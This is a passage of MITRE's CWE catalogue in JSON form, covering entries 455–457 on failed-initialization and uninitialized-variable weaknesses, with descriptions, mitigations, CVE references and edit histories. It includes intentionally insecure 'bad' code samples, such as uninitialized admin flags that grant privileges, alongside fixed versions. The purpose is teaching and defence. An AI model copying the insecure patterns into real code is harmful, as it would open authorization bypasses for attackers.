Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"External Initialization of Trusted Variables or Values","attr":{"@_Date":"2008-04-11"}},{"#text":"External Initialization of Trusted Variables","attr":{"@_Date":"2010-02-16"}}]}},"455":{"attr":{"@_ID":"455","@_Name":"Non-exit on Failed Initialization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error, which can cause the software to execute in a less secure fashion than intended by the administrator.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"636","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Alter Execution Logic"],"Note":"The application could be placed in an insecure state that may allow an attacker to modify sensitive data or allow unintended logic to be executed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Follow the principle of failing securely when an error occurs. The system should enter a state where it is not vulnerable and will not display sensitive error messages to a potential attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1345","Description":"Product does not trigger a fatal error if missing or invalid ACLs are in a configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1345"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Non-exit on Failed Initialization"}},"Notes":{"Note":{"#text":"Under-studied. These issues are not frequently reported, and it is difficult to find published examples.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"456":{"attr":{"@_ID":"456","@_Name":"Missing Initialization of a Variable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not initialize critical variables, which causes the execution environment to use unexpected values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"909","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"89","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"457","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Quality Degradation","Varies by Context"],"Note":"The uninitialized data may be invalid, causing logic errors within the program. In some cases, this could result in a security problem."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Check that critical variables are initialized."},{"Phase":"Testing","Description":"Use a static analysis tool to spot non-initialized variables."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This function attempts to extract a pair of numbers from a user-supplied string.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void parse_data(char *untrusted_input){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int m, n, error;error = sscanf(untrusted_input, \\"%d:%d\\", &amp;m, &amp;n);if ( EOF == error ){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"die(\\"Did not specify integer value. Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* proceed assuming n and m are initialized correctly */"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"123:"}],"Body_Text":["This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form:","then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457)."]},{"Intro_Text":"Here, an uninitialized field in a Java class is used in a seldom-called method, which would cause a NullPointerException to be thrown.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private User user;public void someMethod() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...String username = user.getName();","xhtml:br":["","","","",""],"xhtml:i":["// Do something interesting.","// Throws NPE if user hasn\'t been properly initialized."]}}}}},{"Intro_Text":"This code first authenticates a user, then allows a delete command if the user is an administrator.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (authenticate($username,$password) &amp;&amp; setAdmin($username)){}if ($isAdmin){}","xhtml:div":[{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"deleteUser($userToDelete);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"The $isAdmin variable is set to true if the user is an admin, but is uninitialized otherwise. If PHP\'s register_globals feature is enabled, an attacker can set uninitialized variables like $isAdmin to arbitrary values, in this case gaining administrator privileges by setting $isAdmin to true."},{"Intro_Text":"In the following Java code the BankManager class uses the user variable of the class User to allow authorized users to perform bank manager tasks. The user variable is initialized within the method setUser that retrieves the User from the User database. The user is then authenticated as unauthorized user through the method authenticateUser.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManager {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private User user = null;private boolean isUserAuthentic = false;public BankManager() {}public User getUserFromUserDatabase(String username){}public void setUser(String username) {}public boolean authenticateUser(String username, String password) {}...","xhtml:br":["","","","","","","","","","","","","","","","","",""],"xhtml:i":["// user allowed to perform bank manager tasks","// constructor for BankManager class","// retrieve user from database of users","// set user variable using username","// authenticate user","// methods for performing bank manager tasks"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"this.user = getUserFromUserDatabase(username);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (username.equals(user.getUsername()) &amp;&amp; password.equals(user.getPassword())) {}return isUserAuthentic;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isUserAuthentic = true;","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankManager {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private User user = null;private boolean isUserAuthentic = false;public BankManager(String username) {}public User getUserFromUserDatabase(String username) {...}public boolean authenticateUser(String username, String password) {}","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// user allowed to perform bank manager tasks","// constructor for BankManager class","// retrieve user from database of users","// authenticate user"],"xhtml:div":[{"#text":"user = getUserFromUserDatabase(username);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (user == null) {}else {}return isUserAuthentic;","xhtml:div":[{"#text":"System.out.println(\\"Cannot find user \\" + username);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (password.equals(user.getPassword())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isUserAuthentic = true;","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// methods for performing bank manager tasks"}}]}}}}],"Body_Text":"However, if the method setUser is not called before authenticateUser then the user variable will not have been initialized and will result in a NullPointerException. The code should verify that the user variable has been initialized before it is used, as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2009-2692","Description":"Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2020-20739","Description":"A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739"},{"Reference":"CVE-2005-2978","Description":"Product uses uninitialized variables for size and index, leading to resultant buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2978"},{"Reference":"CVE-2005-2109","Description":"Internal variable in PHP application is not initialized, allowing external modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2109"},{"Reference":"CVE-2005-2193","Description":"Array variable not initialized in PHP application, leading to resultant SQL injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2193"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Initialization"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR30-C","Entry_Name":"Set errno to zero before calling a library function known to set errno,  and check errno only after the function returns a value indicating failure","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL04-PL","Entry_Name":"Always initialize local variables","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL33-PL","Entry_Name":"Declare identifiers before using them","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-456"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-456"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-456"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-456"}}]},"Notes":{"Note":[{"#text":"This weakness is a major factor in a number of resultant weaknesses, especially in web applications that allow global variable initialization (such as PHP) with libraries that can be directly requested.","attr":{"@_Type":"Relationship"}},{"#text":"It is highly likely that a large number of resultant weaknesses have missing initialization as a primary factor, but researcher reports generally do not provide this level of detail.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Missing Initialization","attr":{"@_Date":"2013-02-21"}}}},"457":{"attr":{"@_ID":"457","@_Name":"Use of Uninitialized Variable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses a variable that has not been initialized, leading to unpredictable or unintended results.","Extended_Description":"In some languages such as C and C++, stack variables are not initialized by default. They generally contain junk data with the contents of stack memory before the function was invoked. An attacker can sometimes control or read these contents. In other languages or conditions, a variable that is not explicitly initialized can be given a default value that has security implications, depending on the logic of the program. The presence of an uninitialized variable can sometimes indicate a typographic error in the code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"908","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Often"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"In C, using an uninitialized char * in some string libraries will return incorrect results, as the libraries expect the null terminator to always be at the end of a string, even if the string is empty."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Availability","Integrity","Other"],"Impact":"Other","Note":"Initial variables usually contain junk, which can not be trusted for consistency. This can lead to denial of service conditions, or modify control flow in unexpected ways. In some cases, an attacker can \\"pre-initialize\\" the variable using previous actions, which might enable code execution. This can cause a race condition if a lock variable check passes when it should not."},{"Scope":["Authorization","Other"],"Impact":"Other","Note":"Strings that are not initialized are especially dangerous, since many functions expect a null at the end -- and only at the end -- of a string."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Assign all variables to an initial value."},{"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":"Most compilers will complain about the use of uninitialized variables if warnings are turned on."},{"Phase":["Implementation","Operation"],"Description":"When using a language that does not require explicit declaration of variables, run or compile the software in a mode that reports undeclared or unknown variables. This may indicate the presence of a typographic error in the variable\'s name."},{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Architecture and Design","Description":"Mitigating technologies such as safe string libraries and container abstractions could be introduced."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code prints a greeting using information stored in a POST request:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (isset($_POST[\'names\'])) {}echo \\"Hello \\" . $nameArray[\'first\'];","xhtml:div":{"#text":"$nameArray = $_POST[\'names\'];","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}},"Body_Text":"This code checks if the POST array \'names\' is set before assigning it to the $nameArray variable. However, if the array is not in the POST request, $nameArray will remain uninitialized. This will cause an error when the array is accessed to print the greeting message, which could lead to further exploit."},{"Intro_Text":"The following switch statement is intended to set the values of the variables aN and bN before they are used:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int aN, Bn;switch (ctl) {}repaint(aN, bN);","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case -1:case 0:case 1:default:","xhtml:div":[{"#text":"aN = 0;bN = 0;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = i;bN = -i;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = i + NEXT_SZ;bN = i - NEXT_SZ;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"aN = -1;aN = -1;break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}},"Body_Text":"In the default case of the switch statement, the programmer has accidentally set the value of aN twice. As a result, bN will have an undefined value. Most uninitialized variable issues result in general software reliability problems, but if attackers can intentionally trigger the use of an uninitialized variable, they might be able to launch a denial of service attack by crashing the program. Under the right circumstances, an attacker may be able to control the value of an uninitialized variable by affecting the values on the stack prior to the invocation of the function."},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2008-3688","Description":"Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2007-4682","Description":"Crafted input triggers dereference of an uninitialized object pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682"},{"Reference":"CVE-2007-3468","Description":"Crafted audio file triggers crash when an uninitialized variable is used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3468"},{"Reference":"CVE-2007-2728","Description":"Uninitialized random seed variable used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2728"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Uninitialized variable"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Uninitialized Variable"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL33-PL","Entry_Name":"Declare identifiers before using them","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-436"}},{"attr":{"@_External_Reference_ID":"REF-437"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated 